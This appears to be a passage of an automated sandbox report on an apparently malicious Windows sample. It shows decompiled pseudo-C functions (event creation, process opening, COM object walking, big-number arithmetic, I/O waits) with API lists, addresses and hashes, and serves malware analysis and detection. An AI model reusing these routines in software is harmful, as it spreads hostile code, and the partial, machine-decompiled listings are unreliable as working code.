Part of subcall function 00BB6108: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?,?,00000000), ref: 00BB6114
Part of subcall function 00BB6108: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?), ref: 00BB6172
Part of subcall function 00BB6108: lstrcpy.KERNEL32(00000000,00000000), ref: 00BB6182

SetEvent.KERNEL32(?), ref: 00BBA33E

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 4eed7b55996d14f857cae58fba78609509141168065c9db00dcb70a69e8711b2
Instruction ID: 29a5a09429f0deb88a31ec67ba111c7bc55e6cb2ab5604f6ef08ac5d875de9a2
Opcode Fuzzy Hash: 4eed7b55996d14f857cae58fba78609509141168065c9db00dcb70a69e8711b2
Instruction Fuzzy Hash: F3016D31504200ABDB30AF75DC85FABBAE9EF44764F214B65F551A20E0DBB1D804DA66

Uniqueness

Uniqueness Score: -1.00%

Function 00BB12ED, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB12ED(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xbbd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xbbd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xbbd258 = _t6;
					 *0xbbd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xbbd254 = _t7;
					if(_t7 == 0) {
						 *0xbbd254 =  *0xbbd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x00bb12f5
0x00bb12fb
0x00bb1302
0x00000000
0x00bb135c
0x00bb1304
0x00bb130c
0x00bb1319
0x00bb1319
0x00bb1359
0x00000000
0x00bb1359
0x00bb131b
0x00bb131b
0x00bb1320
0x00bb1332
0x00bb1337
0x00bb133d
0x00bb1343
0x00bb134a
0x00bb134c
0x00bb134c
0x00000000
0x00bb1353
0x00bb1315
0x00000000
0x00000000
0x00bb1317
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00BBA21D,?,?,00000001,?,?,?,00BB5C19,?), ref: 00BB12F5
GetVersion.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BB1304
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BB1320
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BB133D
GetLastError.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BB135C

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 43ce8d78ab3b23db43170c067e185564c54a2c8e8d571e4d4f9569c08ba38627
Instruction ID: f42b7e3a85860030b4fc84d7af63ba1d62a4dba7ce1c3106e3793f2ed2a600e7
Opcode Fuzzy Hash: 43ce8d78ab3b23db43170c067e185564c54a2c8e8d571e4d4f9569c08ba38627
Instruction Fuzzy Hash: 76F0A430544342EBDB109B28EC29B693FE1E744705F904B19E542C71E0FEF4C441CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1A34, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00BB1A6F
SysFreeString.OLEAUT32(00000000), ref: 00BB1B54

Part of subcall function 00BB7B9D: SysAllocString.OLEAUT32(00BBC2B0), ref: 00BB7BED

SafeArrayDestroy.OLEAUT32(00000000), ref: 00BB1BA7
SysFreeString.OLEAUT32(00000000), ref: 00BB1BB6

Part of subcall function 00BB8803: Sleep.KERNEL32(000001F4), ref: 00BB884B

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: cf58b2c830924bd4809e26f619439107a5b4122f311ce54d6b5564c0eb567280
Instruction ID: ce0be505708727c8799c47f28561eaa3a316500ce1a7afcb1d94f351350ebc0e
Opcode Fuzzy Hash: cf58b2c830924bd4809e26f619439107a5b4122f311ce54d6b5564c0eb567280
Instruction Fuzzy Hash: 3E516135900609EFDB11DFA8C854AEEB7F6FF88740B148968E515DB220EBB1DD06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7B9D, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00BB7B9D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xbbd2a4; // 0x2a5a5a8
					_t5 = _t103 + 0xbbe038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xbbc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xbbd2a4; // 0x2a5a5a8
												_t28 = _t109 + 0xbbe0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xbbd2a4; // 0x2a5a5a8
														_t33 = _t79 + 0xbbe078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x00bb7ba2
0x00bb7bab
0x00bb7bac
0x00bb7bb0
0x00bb7bb6
0x00bb7bbc
0x00bb7bc5
0x00bb7bcb
0x00bb7bd5
0x00bb7bd7
0x00bb7bdd
0x00bb7be2
0x00bb7bed
0x00bb7bf3
0x00bb7bf8
0x00bb7d1a
0x00bb7bfe
0x00bb7bfe
0x00bb7c0b
0x00bb7c11
0x00bb7c17
0x00bb7c1b
0x00bb7c21
0x00bb7c2e
0x00bb7c32
0x00bb7c38
0x00bb7c3b
0x00bb7c43
0x00bb7c44
0x00bb7c48
0x00bb7c4c
0x00bb7c4f
0x00bb7c52
0x00bb7c58
0x00bb7c61
0x00bb7c67
0x00bb7c68
0x00bb7c6b
0x00bb7c6c
0x00bb7c6d
0x00bb7c75
0x00bb7c76
0x00bb7c77
0x00bb7c79
0x00bb7c7d
0x00bb7c81
0x00000000
0x00000000
0x00bb7c87
0x00bb7c90
0x00bb7c96
0x00bb7ca0
0x00bb7ca4
0x00bb7ca6
0x00bb7cb3
0x00bb7cb7
0x00bb7cbf
0x00bb7cc4
0x00bb7cd6
0x00bb7cd8
0x00bb7cde
0x00bb7cde
0x00bb7ce7
0x00bb7ce7
0x00bb7ce9
0x00bb7cef
0x00bb7cef
0x00bb7cf2
0x00bb7cf8
0x00bb7cfb
0x00bb7d04
0x00000000
0x00000000
0x00000000
0x00bb7d04
0x00bb7c58
0x00bb7c52
0x00bb7c3b
0x00bb7d0a
0x00bb7d0a
0x00bb7d10
0x00bb7d10
0x00bb7d16
0x00bb7d16
0x00bb7d1f
0x00bb7d25
0x00bb7d25
0x00bb7be2
0x00bb7d2e

APIs

SysAllocString.OLEAUT32(00BBC2B0), ref: 00BB7BED
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00BB7CCE
SysFreeString.OLEAUT32(00000000), ref: 00BB7CE7
SysFreeString.OLEAUT32(?), ref: 00BB7D16

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: b7ef8aaf5749ec26f46d443d2a2ec4133e60ef42a8423a0e0b0fe5ed52aca944
Instruction ID: 833ce30eb01b2e15a2025b6336a39b1c4dc59ab91f87e8944d16d3d751d21dca
Opcode Fuzzy Hash: b7ef8aaf5749ec26f46d443d2a2ec4133e60ef42a8423a0e0b0fe5ed52aca944
Instruction Fuzzy Hash: FA513075D0051AEFCB01DFA8C8889EEB7B9FFC9704B144599E915EB210DBB1AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB57D8, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00BB57D8(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00BBA190(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00BB13CE(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00BB6269(_t101,  &_v236, _a8, _t96 - _t81);
					E00BB6269(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00BB13CE(_t101, 0xbbd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00BB13CE(_a16, _a4);
						E00BB56A4(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00BBB088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00BBB082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00BB1116(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00BB1469(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00BBA385(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xbbd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00bb57db
0x00bb57e7
0x00bb57ed
0x00bb57f2
0x00bb57f6
0x00bb5953
0x00bb5957
0x00bb5957
0x00bb57fc
0x00bb5800
0x00bb5804
0x00bb5807
0x00bb5812
0x00bb5818
0x00bb581d
0x00bb5820
0x00bb583a
0x00bb5846
0x00bb584f
0x00bb5859
0x00bb585e
0x00bb5860
0x00bb5863
0x00bb5911
0x00bb5917
0x00bb5928
0x00bb593b
0x00bb594b
0x00000000
0x00bb5950
0x00bb586c
0x00bb5873
0x00bb5877
0x00bb587d
0x00bb587f
0x00bb5881
0x00bb5883
0x00bb5885
0x00bb588f
0x00bb5894
0x00bb5896
0x00bb5898
0x00bb5899
0x00bb589a
0x00bb589b
0x00bb58a2
0x00bb58a9
0x00bb58ac
0x00bb58ac
0x00bb5879
0x00bb5879
0x00bb5879
0x00bb58b4
0x00bb58bc
0x00bb58c5
0x00bb58ca
0x00bb58ca
0x00bb58cf
0x00000000
0x00000000
0x00bb58d1
0x00bb58d4
0x00bb58de
0x00000000
0x00000000
0x00bb58e0
0x00bb58e0
0x00bb58ea
0x00bb58ca
0x00bb58cf
0x00000000
0x00000000
0x00000000
0x00bb58cf
0x00bb58f4
0x00bb58f7
0x00bb58fa
0x00bb5901
0x00bb5901
0x00bb590e
0x00000000
0x00bb590e
0x00bb5809
0x00bb580d
0x00bb580e
0x00bb5810
0x00000000
0x00000000
0x00000000
0x00bb5810
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00BB5885
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00BB589B
memset.NTDLL ref: 00BB593B
memset.NTDLL ref: 00BB594B

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 95bb8d426a8642eaee811c701a65ea2474239bcaed3193c67bf3231c781e7fd8
Instruction ID: 2df1a8b0c0d71dab0a2e07486b04bafba59cf56eabc65eef614b565db34b7c2d
Opcode Fuzzy Hash: 95bb8d426a8642eaee811c701a65ea2474239bcaed3193c67bf3231c781e7fd8
Instruction Fuzzy Hash: 61419631A00219ABDB209FA8CC81BFE77F8EF44710F1089A9F915A7180EBF09D55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74B04D40), ref: 00BBA97E

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

ResetEvent.KERNEL32(?), ref: 00BBA9F2
GetLastError.KERNEL32 ref: 00BBAA15
GetLastError.KERNEL32 ref: 00BBAAC0

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 8ffe8f2d9389ef4bbcd0707c012189d8d2ffbedbf34d3095dd13658d6155a2ba
Instruction ID: 251adebf3c0063145dbc7ef16cc1f2cb45cdca490ad206272f8d16d184484cb1
Opcode Fuzzy Hash: 8ffe8f2d9389ef4bbcd0707c012189d8d2ffbedbf34d3095dd13658d6155a2ba
Instruction Fuzzy Hash: B9416371900604BFDB31AFA5CD88EAB7BFDEF45700B144A69F542E20A0E7F19944DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5574, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00BB5574(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0xbbd138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0xbbd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E00BB98E4(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0xbbd138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E00BB5DE8(_v16);
							if(_t58 == 0) {
								_t58 = E00BB214C(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E00BB1BC5( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E00BB1BC5( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x00bb5574
0x00bb5583
0x00bb5588
0x00bb558a
0x00bb558f
0x00bb5590
0x00bb5595
0x00bb5596
0x00bb55a1
0x00bb55d2
0x00bb55d7
0x00bb569a
0x00bb569d
0x00bb56a3
0x00bb56a3
0x00bb55e4
0x00bb55ec
0x00bb5697
0x00000000
0x00bb5697
0x00bb55f7
0x00bb55fc
0x00bb5601
0x00bb5689
0x00bb568a
0x00bb568a
0x00bb5690
0x00000000
0x00bb5690
0x00bb5607
0x00bb5609
0x00bb560f
0x00bb5610
0x00bb5610
0x00bb5613
0x00bb5616
0x00bb561c
0x00bb5621
0x00bb5622
0x00bb5627
0x00bb562a
0x00bb5635
0x00000000
0x00000000
0x00bb563d
0x00bb5645
0x00bb566e
0x00bb5671
0x00bb5678
0x00bb5683
0x00bb5683
0x00000000
0x00bb5678
0x00bb5651
0x00bb5655
0x00000000
0x00000000
0x00bb5657
0x00bb565c
0x00000000
0x00000000
0x00bb565e
0x00bb565e
0x00bb5663
0x00000000
0x00000000
0x00bb5665
0x00bb5666
0x00bb5669
0x00bb5669
0x00bb5610
0x00bb55a9
0x00bb55b1
0x00bb55ca
0x00bb55cc
0x00000000
0x00000000
0x00000000
0x00bb55cc
0x00bb55bd
0x00bb55c1
0x00000000
0x00000000
0x00bb55c7
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 00BB558A
GetLastError.KERNEL32 ref: 00BB55A3

Part of subcall function 00BB1BC5: WaitForMultipleObjects.KERNEL32(00000002,00BBAA33,00000000,00BBAA33,?,?,?,00BBAA33,0000EA60), ref: 00BB1BE0

ResetEvent.KERNEL32(?), ref: 00BB561C
GetLastError.KERNEL32 ref: 00BB5637

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 5b4ec9b353c97851a8f0e01bfcdd14a949b429d98eff09e3348f1bdce62076f5
Instruction ID: 407f64391c0396647158cdeaa7bd0092a4d0bb76b4690734c5b02bb2a76a0cf7
Opcode Fuzzy Hash: 5b4ec9b353c97851a8f0e01bfcdd14a949b429d98eff09e3348f1bdce62076f5
Instruction Fuzzy Hash: 58318632600A04ABDB319BA4CC44FFE77F5EF88360F6506A5E516D7190EAF0DD419B11

Uniqueness

Uniqueness Score: -1.00%

Function 6E1283C5, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1283FB
__isleadbyte_l.LIBCMT ref: 6E128429
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E128457
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E12848D

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: cff1babed407d744bd919cec95c08b616448c6afe7b5ac2bd792ebe622bb6397
Instruction ID: eee057fe9e5f19638c067f1808be23119f7c1ccb031f90b971be4775a8021d19
Opcode Fuzzy Hash: cff1babed407d744bd919cec95c08b616448c6afe7b5ac2bd792ebe622bb6397
Instruction Fuzzy Hash: 30316131A04296EFEB518EE5CC44BAA7BB9FF41314F218579E9648B190D730D8D1EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9306, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00BB9306(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xbbd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xbbd2a4; // 0x2a5a5a8
				_t3 = _t8 + 0xbbe862; // 0x61636f4c
				_t25 = 0;
				_t30 = E00BB7FCE(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xbbd2a8, 1, 0, _t30);
					E00BB5DE8(_t30);
				}
				_t12 =  *0xbbd25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00BB24C7() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00BB5CB0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xbbd110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00BB13E3(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00bb9307
0x00bb930e
0x00bb9318
0x00bb931c
0x00bb9322
0x00bb9331
0x00bb9338
0x00bb933c
0x00bb934e
0x00bb9350
0x00bb9350
0x00bb9355
0x00bb935c
0x00bb93b3
0x00bb93b3
0x00bb93b9
0x00bb93bb
0x00bb93bb
0x00bb93c5
0x00bb93c9
0x00bb93db
0x00bb93db
0x00bb93df
0x00bb93e5
0x00bb93e5
0x00000000
0x00bb9375
0x00bb937a
0x00bb9382
0x00bb9386
0x00bb938a
0x00bb938a
0x00bb9397
0x00bb939b
0x00bb939f
0x00bb93f4
0x00bb93fa
0x00bb93fa
0x00bb93ad
0x00bb93b1
0x00bb93e8
0x00bb93ea
0x00bb93ed
0x00bb93ed
0x00000000
0x00bb93ea
0x00bb93b1
0x00000000
0x00bb939b

APIs

Part of subcall function 00BB7FCE: lstrlen.KERNEL32(00BB197C,00000000,00000000,00000027,00000005,00000000,00000000,00BB8899,74666F53,00000000,00BB197C,00BBD00C,?,00BB197C), ref: 00BB8004
Part of subcall function 00BB7FCE: lstrcpy.KERNEL32(00000000,00000000), ref: 00BB8028
Part of subcall function 00BB7FCE: lstrcat.KERNEL32(00000000,00000000), ref: 00BB8030

CreateEventA.KERNEL32(00BBD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00BBA849,?,00000001,?), ref: 00BB9347

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

